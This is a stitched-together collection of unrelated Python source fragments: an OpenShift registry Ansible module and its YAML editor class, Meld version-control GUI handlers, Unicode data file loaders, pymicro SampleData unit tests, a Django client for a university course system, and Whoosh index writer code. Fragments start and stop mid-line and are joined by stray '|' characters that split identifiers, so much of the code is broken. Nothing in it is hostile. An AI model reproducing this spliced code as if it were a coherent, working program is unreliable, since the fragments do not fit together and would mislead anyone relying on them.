required: False
default: None
aliases: []
service_account:
description:
- Name of the service account to use to run the registry pod.
required: False
default: 'registry'
aliases: []
tls_certificate:
description:
- An optional path to a PEM encoded certificate (which may contain the private key) for serving over TLS
required: false
default: None
aliases: []
tls_key:
description:
- An optional path to a PEM encoded private key for serving over TLS
required: false
default: None
aliases: []
volume_mounts:
description:
- The volume mounts for the registry.
required: false
default: None
aliases: []
daemonset:
description:
- Use a daemonset instead of a deployment config.
required: false
default: False
aliases: []
edits:
description:
- A list of modifications to make on the deploymentconfig
required: false
default: None
aliases: []
env_vars:
description:
- A dictionary of modifications to make on the deploymentconfig. e.g. FOO: BAR
required: false
default: None
aliases: []
force:
description:
- Force a registry update.
required: false
default: False
aliases: []
author:
- "Kenny Woodson <kwoodson@redhat.com>"
extends_documentation_fragment: []
'''
EXAMPLES = '''
- name: create a secure registry
oc_adm_registry:
name: docker-registry
service_account: registry
replicas: 2
namespace: default
selector: type=infra
images: "registry.ops.openshift.com/openshift3/ose-${component}:${version}"
env_vars:
REGISTRY_CONFIGURATION_PATH: /etc/registryconfig/config.yml
REGISTRY_HTTP_TLS_CERTIFICATE: /etc/secrets/registry.crt
REGISTRY_HTTP_TLS_KEY: /etc/secrets/registry.key
REGISTRY_HTTP_SECRET: supersecret
volume_mounts:
- path: /etc/secrets
name: dockercerts
type: secret
secret_name: registry-secret
- path: /etc/registryconfig
name: dockersecrets
type: secret
secret_name: docker-registry-config
edits:
- key: spec.template.spec.containers[0].livenessProbe.httpGet.scheme
value: HTTPS
action: put
- key: spec.template.spec.containers[0].readinessProbe.httpGet.scheme
value: HTTPS
action: put
- key: spec.strategy.rollingParams
value:
intervalSeconds: 1
maxSurge: 50%
maxUnavailable: 50%
timeoutSeconds: 600
updatePeriodSeconds: 1
action: put
- key: spec.template.spec.containers[0].resources.limits.memory
value: 2G
action: update
- key: spec.template.spec.containers[0].resources.requests.memory
value: 1G
action: update
register: registryout
'''
# -*- -*- -*- End included fragment: doc/registry -*- -*- -*-
# -*- -*- -*- Begin included fragment: ../../lib_utils/src/class/yedit.py -*- -*- -*-
class YeditException(Exception): # pragma: no cover
''' Exception class for Yedit '''
pass
# pylint: disable=too-many-public-methods
class Yedit(object): # pragma: no cover
''' Class to modify yaml files '''
re_valid_key = r"(((\[-?\d+\])|([0-9a-zA-Z%s/_-]+)).?)+$"
re_key = r"(?:\[(-?\d+)\])|([0-9a-zA-Z{}/_-]+)"
com_sep = set(['.', '#', '|', ':'])
# pylint: disable=too-many-arguments
def __init__(self,
filename=None,
content=None,
content_type='yaml',
separator='.',
backup=False):
self.content = content
self._separator = separator
self.filename = filename
self.__yaml_dict = content
self.content_type = content_type
self.backup = backup
self.load(content_type=self.content_type)
if self.__yaml_dict is None:
self.__yaml_dict = {}
@property
def separator(self):
''' getter method for separator '''
return self._separator
@separator.setter
def separator(self, inc_sep):
''' setter method for separator '''
self._separator = inc_sep
@property
def yaml_dict(self):
''' getter method for yaml_dict '''
return self.__yaml_dict
@yaml_dict.setter
def yaml_dict(self, value):
''' setter method for yaml_dict '''
self.__yaml_dict = value
@staticmethod
def parse_key(key, sep='.'):
'''parse the key allowing the appropriate separator'''
common_separators = list(Yedit.com_sep - set([sep]))
return re.findall(Yedit.re_key.format(''.join(common_separators)), key)
@staticmethod
def valid_key(key, sep='.'):
'''validate the incoming key'''
common_separators = list(Yedit.com_sep - set([sep]))
if not re.match(Yedit.re_valid_key.format(''.join(common_separators)), key):
return False
return True
@staticmethod
def remove_entry(data, key, sep='.'):
''' remove data at location key '''
if key == '' and isinstance(data, dict):
data.clear()
return True
elif key == '' and isinstance(data, list):
del data[:]
return True
if not (key and Yedit.valid_key(key, sep)) and \
isinstance(data, (list, dict)):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_key and isinstance(data, dict):
data = data.get(dict_key)
elif (arr_ind and isinstance(data, list) and
int(arr_ind) <= len(data) - 1):
data = data[int(arr_ind)]
else:
return None
# process last index for remove
# expected list entry
if key_indexes[-1][0]:
if isinstance(data, list) and int(key_indexes[-1][0]) <= len(data) - 1: # noqa: E501
del data[int(key_indexes[-1][0])]
return True
# expected dict entry
elif key_indexes[-1][1]:
if isinstance(data, dict):
del data[key_indexes[-1][1]]
return True
@staticmethod
def add_entry(data, key, item=None, sep='.'):
''' Get an item from a dictionary with key notation a.b.c
d = {'a': {'b': 'c'}}}
key = a#b
return c
'''
if key == '':
pass
elif (not (key and Yedit.valid_key(key, sep)) and
isinstance(data, (list, dict))):
return None
key_indexes = Yedit.parse_key(key, sep)
for arr_ind, dict_key in key_indexes[:-1]:
if dict_ |
s'.
"""
self.scheduler.add_task(self._command_iter(command, files, refresh))
def _command_on_selected(self, command, refresh=1):
files = self._get_selected_files()
if len(files):
self._command(command, files, refresh)
def on_button_update_clicked(self, obj):
self._command_on_selected(self.vc.update_command())
def on_button_commit_clicked(self, obj):
CommitDialog(self).run()
def on_button_add_clicked(self, obj):
self._command_on_selected(self.vc.add_command())
def on_button_remove_clicked(self, obj):
self._command_on_selected(self.vc.remove_command())
def on_button_resolved_clicked(self, obj):
self._command_on_selected(self.vc.resolved_command())
def on_button_revert_clicked(self, obj):
self._command_on_selected(self.vc.revert_command())
def on_button_delete_clicked(self, obj):
files = self._get_selected_files()
for name in files:
try:
if os.path.isfile(name):
os.remove(name)
elif os.path.isdir(name):
if misc.run_dialog(_("'%s' is a directory.\nRemove recursively?") % os.path.basename(name),
parent = self,
buttonstype=gtk.BUTTONS_OK_CANCEL) == gtk.RESPONSE_OK:
shutil.rmtree(name)
except OSError as e:
misc.run_dialog(_("Error removing %s\n\n%s.") % (name,e), parent = self)
workdir = _commonprefix(files)
self.refresh_partial(workdir)
def on_button_diff_clicked(self, obj):
files = self._get_selected_files()
if len(files):
self.run_diff(files)
def open_external(self):
self._open_files(self._get_selected_files())
def show_patch(self, prefix, patch, silent=False):
if vc._vc.call(["which", "patch"]):
primary = _("Patch tool not found")
secondary = _("Meld needs the <i>patch</i> tool to be installed "
"to perform comparisons in %s repositories. Please "
"install <i>patch</i> and try again.") % self.vc.NAME
msgarea = self.msgarea_mg | r.new_from_text_and_icon(
gtk.STOCK_DIALOG_ERROR, primary, secondary)
msgarea.add_button(_("Hi_de"), gtk.RESPONSE_CLOSE)
msgarea.connect("response", lambda *args: s | elf.msgarea_mgr.clear())
msgarea.show_all()
return False
tmpdir = tempfile.mkdtemp("-meld")
_temp_dirs.append(tmpdir)
diffs = []
for fname in self.vc.get_patch_files(patch):
destfile = os.path.join(tmpdir,fname)
destdir = os.path.dirname( destfile )
if not os.path.exists(destdir):
os.makedirs(destdir)
pathtofile = os.path.join(prefix, fname)
try:
shutil.copyfile( pathtofile, destfile)
except IOError: # it is missing, create empty file
open(destfile,"w").close()
diffs.append( (destfile, pathtofile) )
patchcmd = self.vc.patch_command(tmpdir)
try:
result = misc.write_pipe(patchcmd, patch, error=misc.NULL)
except OSError:
result = 1
if result == 0:
for d in diffs:
os.chmod(d[0], 0o444)
self.emit("create-diff", d)
return True
elif not silent:
primary = _("Error fetching original comparison file")
secondary = _("Meld couldn't obtain the original version of your "
"comparison file. If you are using the most recent "
"version of Meld, please report a bug, including as "
"many details as possible.")
msgarea = self.msgarea_mgr.new_from_text_and_icon(
gtk.STOCK_DIALOG_ERROR, primary, secondary)
msgarea.add_button(_("Hi_de"), gtk.RESPONSE_CLOSE)
msgarea.add_button(_("Report a bug"), gtk.RESPONSE_OK)
def patch_error_cb(msgarea, response):
if response == gtk.RESPONSE_OK:
bug_url = "https://bugzilla.gnome.org/enter_bug.cgi?" + \
"product=meld"
misc.open_uri(bug_url)
else:
self.msgarea_mgr.clear()
msgarea.connect("response", patch_error_cb)
msgarea.show_all()
return False
def refresh(self):
self.set_location( self.model.value_path( self.model.get_iter_root(), 0 ) )
def refresh_partial(self, where):
if not self.actiongroup.get_action("VcFlatten").get_active():
it = self.find_iter_by_name( where )
if it:
newiter = self.model.insert_after( None, it)
self.model.set_value(newiter, self.model.column_index( tree.COL_PATH, 0), where)
self.model.set_path_state(newiter, 0, tree.STATE_NORMAL, True)
self.model.remove(it)
self.scheduler.add_task(self._search_recursively_iter(newiter))
else: # XXX fixme
self.refresh()
def _update_item_state(self, it, vcentry, location):
e = vcentry
self.model.set_path_state(it, 0, e.state, e.isdir)
def setcol(col, val):
self.model.set_value(it, self.model.column_index(col, 0), val)
setcol(COL_LOCATION, location)
setcol(COL_STATUS, e.get_status())
setcol(COL_REVISION, e.rev)
setcol(COL_TAG, e.tag)
setcol(COL_OPTIONS, e.options)
def on_file_changed(self, filename):
it = self.find_iter_by_name(filename)
if it:
path = self.model.value_path(it, 0)
self.vc.update_file_state(path)
files = self.vc.lookup_files([], [(os.path.basename(path), path)])[1]
for e in files:
if e.path == path:
prefixlen = 1 + len( self.model.value_path( self.model.get_iter_root(), 0 ) )
self._update_item_state( it, e, e.parent[prefixlen:])
return
def find_iter_by_name(self, name):
it = self.model.get_iter_root()
path = self.model.value_path(it, 0)
while it:
if name == path:
return it
elif name.startswith(path):
child = self.model.iter_children( it )
while child:
path = self.model.value_path(child, 0)
if name == path:
return child
elif name.startswith(path):
break
else:
child = self.model.iter_next( child )
it = child
else:
break
return None
def on_console_view_toggle(self, box, event=None):
if box == self.console_hide_box:
self.prefs.vc_console_visible = 0
self.console_hbox.hide()
self.console_show_box.show()
else:
self.prefs.vc_console_visible = 1
self.console_hbox.show()
self.console_show_box.hide()
def on_consoleview_populate_popup(self, text, menu):
item = gtk.ImageMenuItem(gtk.STOCK_CLEAR)
def activate(*args):
buf = text.get_buffer()
buf.delete( buf.get_start_iter(), buf.get_end_iter() )
item.connect("activate", activate)
item.show()
menu.insert( item, 0 )
item = gtk.SeparatorMenuItem()
item.show()
menu.insert( item, 1 )
def on_treeview_cursor_changed(self, *args):
cursor_path, cursor_col = self.treeview.get_cursor()
if not cursor_path:
self.emit("next-diff-changed", False, False)
self.current_path = cursor_path
return
# If invoked directly rather than through a callback, we always check
if not args:
skip = False
else:
try:
old |
composition = "".join(decomposition)
bidi_mirroring = line[9] == "Y"
if general_category == "Ll":
upcode = line[12]
if upcode:
upper_case = int(upcode, 16)
_lower_to_upper_case[code] = upper_case
if char_name.endswith("First>"):
last_range_opener = code
elif char_name.endswith("Last>"):
# Ignore surrogates
if "Surrogate" not in char_name:
for char in range(last_range_opener, code + 1):
_general_category_data[char] = general_category
_combining_class_data[char] = combining_class
if bidi_mirroring:
_bidi_mirroring_characters.add(char)
_defined_characters.add(char)
else:
_character_names_data[code] = char_name
_general_category_data[code] = general_category
_combining_class_data[code] = combining_class
if bidi_mirroring:
_bidi_mirroring_characters.add(code)
_decomposition_data[code] = decomposition
_defined_characters.add(code)
_defined_characters = frozenset(_defined_characters)
_bidi_mirroring_characters = frozenset(_bidi_mirroring_characters)
def _load_scripts_txt():
"""Load script property from Scripts.txt."""
with open_unicode_data_file("Scripts.txt") as scripts_txt:
script_ranges = _parse_code_ranges(scripts_txt.read())
for first, last, script_name in script_ranges:
folded_script_name = _folded_script_name(script_name)
script = _folded_script_name_to_code[folded_script_name]
for char_code in range(first, last + 1):
_script_data[char_code] = script
def _load_script_extensions_txt():
"""Load script property from ScriptExtensions.txt."""
with open_unicode_data_file("ScriptExtensions.txt") as se_txt:
script_extensions_ranges = _parse_code_ranges(se_txt.read())
for first, last, script_names in script_extensions_ranges:
script_set = frozenset(script_names.split(" "))
for character_code in range(first, last + 1):
_script_extensions_data[character_code] = script_set
def _load_blocks_txt():
"""Load block name from Blocks.txt."""
with open_unicode_data_file("Blocks.txt") as blocks_txt:
block_ranges = _parse_code_ranges(blocks_txt.read())
for first, last, block_name in block_ranges:
_block_names.append(block_name)
_block_range[block_name] = (first, last)
for character_code in range(first, last + 1):
_block_data[character_code] = block_name
def _load_derived_age_txt():
"""Load age property from DerivedAge.txt."""
with open_unicode_data_file("DerivedAge.txt") as derived_age_txt:
age_ranges = _parse_code_ranges(derived_age_txt.read())
for first, last, char_age in age_ranges:
for char_code in range(first, last + 1):
_age_data[char_code] = char_age
def _load_der | ived_core_properties_txt():
"""Load derived core properties from Blocks.txt."""
with open_unicode_data_file("DerivedCoreProperties.txt") as dcp_txt:
dcp_ranges = _parse_code_ranges(dcp_txt.read())
for f | irst, last, property_name in dcp_ranges:
for character_code in range(first, last + 1):
try:
_core_properties_data[property_name].add(character_code)
except KeyError:
_core_properties_data[property_name] = {character_code}
def _load_property_value_aliases_txt():
"""Load property value aliases from PropertyValueAliases.txt."""
with open_unicode_data_file("PropertyValueAliases.txt") as pva_txt:
aliases = _parse_semicolon_separated_data(pva_txt.read())
for data_item in aliases:
if data_item[0] == "sc": # Script
code = data_item[1]
long_name = data_item[2]
_script_code_to_long_name[code] = long_name.replace("_", " ")
folded_name = _folded_script_name(long_name)
_folded_script_name_to_code[folded_name] = code
def _load_bidi_mirroring_txt():
"""Load bidi mirroring glyphs from BidiMirroring.txt."""
with open_unicode_data_file("BidiMirroring.txt") as bidi_mirroring_txt:
bmg_pairs = _parse_semicolon_separated_data(bidi_mirroring_txt.read())
for char, bmg in bmg_pairs:
char = int(char, 16)
bmg = int(bmg, 16)
_bidi_mirroring_glyph_data[char] = bmg
def _load_indic_data():
"""Load Indic properties from Indic(Positional|Syllabic)Category.txt."""
with open_unicode_data_file("IndicPositionalCategory.txt") as inpc_txt:
positional_ranges = _parse_code_ranges(inpc_txt.read())
for first, last, char_position in positional_ranges:
for char_code in range(first, last + 1):
_indic_positional_data[char_code] = char_position
with open_unicode_data_file("IndicSyllabicCategory.txt") as insc_txt:
syllabic_ranges = _parse_code_ranges(insc_txt.read())
for first, last, char_syllabic_category in syllabic_ranges:
for char_code in range(first, last + 1):
_indic_syllabic_data[char_code] = char_syllabic_category
def _load_emoji_data():
"""Parse the new draft format of emoji-data.txt"""
global _presentation_default_emoji, _presentation_default_text
global _emoji, _emoji_modifier_base
if _presentation_default_emoji:
return
emoji_sets = {
"Emoji": set(),
"Emoji_Presentation": set(),
"Emoji_Modifier": set(),
"Emoji_Modifier_Base": set(),
"Extended_Pictographic": set(),
"Emoji_Component": set(),
}
set_names = "|".join(sorted(emoji_sets.keys()))
line_re = re.compile(
r"([0-9A-F]{4,6})(?:\.\.([0-9A-F]{4,6}))?\s*;\s*" r"(%s)\s*#.*$" % set_names
)
with open_unicode_data_file("emoji-data.txt") as f:
for line in f:
line = line.strip()
if not line or line[0] == "#":
continue
m = line_re.match(line)
if not m:
raise ValueError('Did not match "%s"' % line)
start = int(m.group(1), 16)
end = start if not m.group(2) else int(m.group(2), 16)
emoji_set = emoji_sets.get(m.group(3))
emoji_set.update(range(start, end + 1))
# allow our legacy use of handshake and wrestlers with skin tone modifiers
emoji_sets["Emoji_Modifier_Base"] |= {0x1F91D, 0x1F93C}
_presentation_default_emoji = frozenset(emoji_sets["Emoji_Presentation"])
_presentation_default_text = frozenset(
emoji_sets["Emoji"] - emoji_sets["Emoji_Presentation"]
)
_emoji_modifier_base = frozenset(emoji_sets["Emoji_Modifier_Base"])
_emoji = frozenset(emoji_sets["Emoji"])
# we have no real use for the 'Emoji_Regional_Indicator' and
# 'Emoji_Component' sets, and they're not documented, so ignore them.
# The regional indicator set is just the 26 regional indicator
# symbols, and the component set is number sign, asterisk, ASCII digits,
# the regional indicators, and the skin tone modifiers.
PROPOSED_EMOJI_AGE = 1000.0
ZWJ = 0x200D
EMOJI_VS = 0xFE0F
EMOJI_SEQUENCE_TYPES = frozenset(
[
"Basic_Emoji",
"Emoji_Keycap_Sequence",
"Emoji_Combining_Sequence",
"Emoji_Flag_Sequence",
"RGI_Emoji_Flag_Sequence",
"RGI_Emoji_Tag_Sequence",
"Emoji_Modifier_Sequence",
"RGI_Emoji_Modifier_Sequence",
"RGI_Emoji_ZWJ_Sequence",
"Emoji_ZWJ_Sequence",
"Emoji_Single_Sequence",
]
)
# Unicode 12 decided to be 'helpful' and included single emoji in the sequence
# data, but unlike all the other data represents these in batches as XXXX..XXXX
# rather than one per line. We can't get name data for these so we can't
# use that data, but still have to parse the line.
def _read_emoji_data(lines):
"""Parse lines of emoji data and return a map from sequence to tuples of
name, age, type."""
line_re = re.compile(
r"(?:([0-9A-F ]+)|([0-9A-F]+\.\.[0-9A-F]+)\s*);\ |
[-1., 1., 0.],
[1., 1., 0.],
[1., -1., 0.],
[0., 0., 1.],
[0., 0., -1.]])
self.mesh_elements = np.array([[0, 1, 4],
[0, 1, 5],
[1, 2, 4],
[1, 2, 5],
[2, 3, 4],
[2, 3, 5],
[3, 0, 4],
[3, 0, 5]])
# Create 2 fields 'shape functions' for the 2 nodes at z=+/-1
self.mesh_shape_f1 = np.array([0., 0., 0., 0., 1., 0.])
self.mesh_shape_f2 = np.array([0., 0., 0., 0., 0., 1.])
# Create 2 element wise fields
self.mesh_el_Id = np.array([0., 1., 2., 3., 4., 5., 6., 7.])
self.mesh_alternated = np.array([1., 1., -1., -1., 1., 1., -1., -1.])
# Create a binary 3D Image
self.image = np.zeros((10, | 10, 10), dtype='int16')
self.image[:, :, :5] = 1
self.image_origin = np.array([-1., -1., -1.])
self.image_voxel_size = np.array([0.2, 0.2, 0.2])
# Create a data array
self.data_array = np.array([math.tan(x) for x in
np.linspace(-math.pi/4, math.pi/4, 51)])
# Create numpy dtype and structure array
# WARNING: Pytables transforms all strings into | bytes
# --> use only bytes in dtypes
self.dtype1 = np.dtype([('density', np.float32),
('melting_Pt', np.float32),
('Chemical_comp', 'S', 30)])
self.struct_array1 = np.array([(6.0, 1232, 'Cu2O'),
(5.85, 2608, 'ZrO2')],
dtype=self.dtype1)
# Test file pathes
self.filename = os.path.join(PYMICRO_EXAMPLES_DATA_DIR,
'test_sampledata')
self.derived_filename = self.filename+'_derived'
self.reference_file = os.path.join(PYMICRO_EXAMPLES_DATA_DIR,
'test_sampledata_ref')
def test_create_sample(self):
"""Test creation of a SampleData instance/file and data storage."""
sample = SampleData(filename=self.filename,
overwrite_hdf5=True, verbose=False,
sample_name=self.sample_name,
sample_description=self.sample_description)
self.assertTrue(os.path.exists(self.filename + '.h5'))
self.assertTrue(os.path.exists(self.filename + '.xdmf'))
self.assertEqual(sample.get_sample_name(), self.sample_name)
self.assertEqual(sample.get_description(), self.sample_description)
# Add mesh data into SampleData dataset
mesh = UMCT.CreateMeshOfTriangles(self.mesh_nodes, self.mesh_elements)
# Add mesh node tags
mesh.nodesTags.CreateTag('Z0_plane', False).SetIds([0, 1, 2, 3])
mesh.nodesTags.CreateTag('out_of_plane', False).SetIds([4, 5])
# Add element tags
mesh.GetElementsOfType('tri3').GetTag('Top').SetIds([0, 2, 4, 6])
mesh.GetElementsOfType('tri3').GetTag('Bottom').SetIds([1, 3, 5, 7])
# Add mesh node fields
mesh.nodeFields['Test_field1'] = self.mesh_shape_f1
mesh.nodeFields['Test_field2'] = self.mesh_shape_f2
# Add mesh element fields
mesh.elemFields['Test_field3'] = self.mesh_el_Id
mesh.elemFields['Test_field4'] = self.mesh_alternated
sample.add_mesh(mesh, meshname='test_mesh', indexname='mesh',
location='/', bin_fields_from_sets=True)
# Add image data into SampleData dataset
image = ConstantRectilinearMesh(dim=len(self.image.shape))
image.SetDimensions(self.image.shape)
image.SetOrigin(self.image_origin)
image.SetSpacing(self.image_voxel_size)
image.elemFields['test_image_field'] = self.image
sample.add_image(image, imagename='test_image', indexname='image',
location='/')
# Add new group and array to SampleData dataset
sample.add_group(groupname='test_group', location='/', indexname='group')
sample.add_data_array(location='group', name='test_array',
array=self.data_array, indexname='array')
# close sample data instance
del sample
# reopen sample data instance
sample = SampleData(filename=self.filename)
# test mesh geometry data recovery
mesh_nodes = sample.get_mesh_nodes(meshname='mesh', as_numpy=True)
self.assertTrue(np.all(mesh_nodes == self.mesh_nodes))
mesh_elements = sample.get_mesh_xdmf_connectivity(meshname='mesh',
as_numpy=True)
mesh_elements = mesh_elements.reshape(self.mesh_elements.shape)
self.assertTrue(np.all(mesh_elements == self.mesh_elements))
# test mesh field recovery
shape_f1 = sample.get_field('Test_field1')
self.assertTrue(np.all(shape_f1 == self.mesh_shape_f1))
# test image field recovery and dictionary like access
image_field = sample['test_image_field']
self.assertTrue(np.all(image_field == self.image))
# test data array recovery and attribute like access
array = sample.test_array
self.assertTrue(np.all(array == self.data_array))
# test sampledata instance and file autodelete function
sample.autodelete = True
del sample
self.assertTrue(not os.path.exists(self.filename+'.h5'))
self.assertTrue(not os.path.exists(self.filename+'.xdmf'))
def test_copy_and_compress(self):
""" Copy the reference dataset and compress it """
sample = SampleData.copy_sample(src_sample_file=self.reference_file,
dst_sample_file=self.filename,
overwrite=True, get_object=True,
autodelete=True)
# get filesizes
original_filesize, _ = sample.get_file_disk_size(print_flag=False,
convert=False)
original_size, _ = sample.get_node_disk_size('test_image_field',
print_flag=False,
convert=False)
# Verify data content
data_array = sample.get_node('test_array')
self.assertTrue(np.all(self.data_array == data_array))
# compress image data
c_opt = {'complib': 'zlib', 'complevel': 1}
sample.set_chunkshape_and_compression(nodename='test_image_field',
compression_options=c_opt)
# assert that node size is smaller after compression
new_size, _ = sample.get_node_disk_size('test_image_field',
print_flag=False,
convert=False)
new_filesize, _ = sample.get_file_disk_size(print_flag=False,
convert=False)
# repack file and assert file size is lower than original filesize
sample.repack_h5file()
new_filesize, _ = sample.get_file_disk_size(print_flag=False,
convert=False)
self.assertGreater(original_filesize, new_filesize)
# delete SampleData instance and assert files deletion
del sample
self.assertTrue(not os.path.exists(self.filename + '.h5'))
self.assertTrue(not os.path.exists(self.filename + '.xdmf'))
def test_derived_class(self):
""" Test application specific data model specification through
derived classes.
Also test table functionalities.
"""
derived_sample = TestDerivedClass(filename=self.derived_filename,
|
import json
import logging
import httplib
import urllib2
from django.core.exceptions import ValidationError
from django.conf import settings
siaUrl=settings.SIA_URL
import re
import string
def sanitize_search_term(term):
# Replace all puncuation with spaces.
allowed_punctuation = set(['&', '|', '"', "'"])
all_punctuation = set(string.punctuat | ion)
punctuation = "".join(all_punctuation - allowed_punctuation)
term = re.sub(r"[{}]+".format(re.escape(punctuation)), " ", \
term)
# Substitute all double quotes to single quotes.
term = term.replace('" | ', "'")
term = re.sub(r"[']+", "'", term)
# Create regex to find strings within quotes.
quoted_strings_re = re.compile(r"('[^']*')")
space_between_words_re = re.compile(r'([^ &|])[ ]+([^ &|])')
spaces_surrounding_letter_re = re.compile(r'[ ]+([^ &|])[ ]+')
multiple_operator_re = re.compile(r"[ &]+(&|\|)[ &]+")
tokens = quoted_strings_re.split(term)
processed_tokens = []
for token in tokens:
# Remove all surrounding whitespace.
token = token.strip()
if token in ['', "'"]:
continue
if token[0] != "'":
# Surround single letters with &'s
token = spaces_surrounding_letter_re.sub(r' & \1 & ', token)
# Specify '&' between words that have neither | or & specified.
token = space_between_words_re.sub(r'\1 & \2', token)
# Add a prefix wildcard to every search term.
token = re.sub(r'([^ &|]+)', r'\1:*', token)
processed_tokens.append(token)
term = " & ".join(processed_tokens)
# Replace ampersands or pipes surrounded by ampersands.
term = multiple_operator_re.sub(r" \1 ", term)
# Escape single quotes
return term.replace("'", "''")
class SIA:
from beaker.cache import CacheManager
from beaker.util import parse_cache_config_options
cache = CacheManager(**parse_cache_config_options({
'cache.type': 'file',
'cache.data_dir': '/tmp/horariossiacache/data',
'cache.lock_dir': '/tmp/horariossiacache/lock',
'cache.regions': 'short_term, long_term',
'cache.short_term.type': 'memory',
'cache.short_term.expire': '3600',
'cache.long_term.type': 'file',
'cache.long_term.expire': '86400'
}))
def existsSubject(this,name,level):
return this.queryNumSubjectsWithName(name,level)>0
def queryNumSubjectsWithName(this,name,level):
data = json.dumps({"method": "buscador.obtenerAsignaturas", "params": [name, level, "", level, "", "", 1, 1]})
req = urllib2.Request(siaUrl + "/JSON-RPC", data, {'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
result = json.loads(f.read())["result"]["totalAsignaturas"]
f.close()
except urllib2.HTTPerror, e:
logging.warning('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.warning('URLError = ' + e.reason)
except httplib.HTTPException, e:
logging.warn('HTTPException')
return result
@cache.region('short_term')
def querySubjectsByName(this,name,level,maxRetrieve):
data = json.dumps({"method": "buscador.obtenerAsignaturas", "params": [name, level, "", level, "", "", 1, maxRetrieve]})
req = urllib2.Request(siaUrl + "/JSON-RPC", data, {'Content-Type': 'application/json'})
try:
f = urllib2.urlopen(req)
result = json.loads(f.read())
f.close()
except urllib2.HTTPerror, e:
logging.warning('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.warning('URLError = ' + e.reason)
except httplib.HTTPException, e:
logging.warn('HTTPException')
return result["result"]["asignaturas"]["list"]
@cache.region('short_term')
def queryGroupsBySubjectCode(this,code):
data = json.dumps({"method": "buscador.obtenerGruposAsignaturas", "params": [code, "0"]})
req = urllib2.Request(siaUrl + "/JSON-RPC", data, {'Content-Type': 'application/json'})
result = None
try:
f = urllib2.urlopen(req)
result = json.loads(f.read())
f.close()
except urllib2.HTTPError, e:
logging.warning('HTTPError = ' + str(e.code))
except urllib2.URLError, e:
logging.warning('URLError = ' + e.reason)
except httplib.HTTPException, e:
logging.warn('HTTPException')
if result:
return result["result"]["list"]
else:
return []
@staticmethod
@cache.region('short_term')
def queryGroupsProfessions(code,group):
import re
while True:
try:
f = urllib2.urlopen(siaUrl + "/service/groupInfo.pub?cod_asignatura=" + str(code) + "&grp=" + str(group))
html = f.read().decode("ISO-8859-1")
break
except urllib2.URLError, e:
if e.code == 403:
pass
else:
logging.warning(str(e))
break
except Exception, e:
logging.warning(str(e))
break
relevantSection = re.compile(r'Los planes de estudio para los cuales se ofrece esta asignatura son:</p><div><ul class="modulelist">(.*)</ul></div>').findall(html)
professions = []
if (len(relevantSection)>0):
professionsHtml = re.compile('<li><p>(.*?)</p></li>').findall(relevantSection[0])
for i in professionsHtml:
data = i.split("-")
professions.append((data[0].strip(),re.compile('<em>(.*)</em>').findall("".join(data[1:]))[0]))
return professions |
self.storage = ix.storage
self.indexname = ix.indexname
info = ix._read_toc()
self.generation = info.generation + 1
self.schema = info.schema
self.segments = info.segments
self.docnum = self.docbase = docbase
self._setup_doc_offsets()
# Internals
self.compound = compound
poolprefix = "whoosh_%s_" % self.indexname
self.pool = PostingPool(limitmb=limitmb, prefix=poolprefix)
newsegment = self.newsegment = codec.new_segment(self.storage,
self.indexname)
self.is_closed = False
self._added = False
# Set up writers
self.perdocwriter = codec.per_document_writer(self.storage, newsegment)
self.fieldwriter = codec.field_writer(self.storage, newsegment)
def __repr__(self):
return "<%s %r>" % (self.__class__.__name__, self.newsegment)
def _setup_doc_offsets(self):
self._doc_offsets = []
base = 0
for s in self.segments:
self._doc_offsets.append(base)
base += s.doc_count_all()
def _check_state(self):
if self.is_closed:
raise IndexingError("This writer is closed")
def add_field(self, fieldname, fieldspec, **kwargs):
self._check_state()
if self._added:
raise Exception("Can't modify schema after adding data to writer")
super(SegmentWriter, self).add_field(fieldname, fieldspec, **kwargs)
def remove_field(self, fieldname):
self._check_state()
if self._added:
raise Exception("Can't modify schema after adding data to writer")
super(SegmentWriter, self).remove_field(fieldname)
def _document_segment(self, docnum):
#Returns the index.Segment object containing the given document
#number.
offsets = self._doc_offsets
if len(offsets) == 1:
return 0
return bisect_right(offsets, docnum) - 1
def _segment_and_docnum(self, docnum):
#Returns an (index.Segment, segment_docnum) pair for the segment
#containing the given document number.
segmentnum = self._document_segment(docnum)
offset = self._doc_offsets[segmentnum]
segment = self.segments[segmentnum]
return segment, docnum - offset
def has_deletions(self):
"""
Returns True if this index has documents that are marked deleted but
haven't been optimized out of the index yet.
"""
return any(s.has_deletions() for s in self.segments)
def delete_document(self, docnum, delete=True):
self._check_state()
if docnum >= sum(seg.doccount for seg in self.segments):
raise IndexingError("No document ID %r in this index" % docnum)
segment, segdocnum = self._segment_and_docnum(docnum)
segment.delete_document(segdocnum, delete=delete)
def deleted_count(self):
"""
:returns: the total number of deleted documents in the index.
"""
return sum(s.deleted_count() for s in self.segments)
def is_deleted(self, docnum):
segment, segdocnum = self._segment_and_docnum(docnum)
return segment.is_deleted(segdocnum)
def reader(self, reuse=None):
from whoosh.filedb.fileindex import FileIndex
self._check_state()
return FileIndex._reader(self.storage, self.schema, self.segments,
self.generation, reuse=reuse)
def iter_postings(self):
return self.pool.iter_postings()
def add_postings(self, lengths, items, startdoc, docmap):
# items = (fieldname, text, docnum, weight, valuestring) ...
schema = self.schema
# Make a generator to strip out deleted fields and renumber the docs
# before passing them down to the field writer
def gen():
for fieldname, text, docnum, weight, valuestring in items:
if fieldname not in schema:
continue
if docmap is not None:
newdoc = docmap[docnum]
else:
newdoc = startdoc + docnum
yield (fieldname, text, newdoc, weight, valuestring)
self.fieldwriter.add_postings(schema, lengths, gen())
def _make_docmap(self, reader, newdoc):
# If the reader has deletions, make a dictionary mapping the docnums
# of undeleted documents to new sequential docnums starting at newdoc
hasdel = reader.has_deletions()
if hasdel:
docmap = {}
for docnum in reader.all_doc_ids():
if reader.is_deleted(docnum):
continue
| docmap[docnum] = newdoc
newdoc += 1
else:
docmap = None
newdoc += reader.doc_count_all()
# Return the map and the new lowest unused document number
return docmap, newdoc
def _merge_per_doc(self, reader, docmap):
schema = self.schema
newdoc = self.docnum
perdocwriter = self.perdocwriter
sharedfields = set(schema.names()) & set(reader.schema.names())
for docnum in reader.all_doc_ids():
| # Skip deleted documents
if docmap and docnum not in docmap:
continue
# Renumber around deletions
if docmap:
newdoc = docmap[docnum]
# Get the stored fields
d = reader.stored_fields(docnum)
# Start a new document in the writer
perdocwriter.start_doc(newdoc)
# For each field in the document, copy its stored value,
# length, and vectors (if any) to the writer
for fieldname in sharedfields:
field = schema[fieldname]
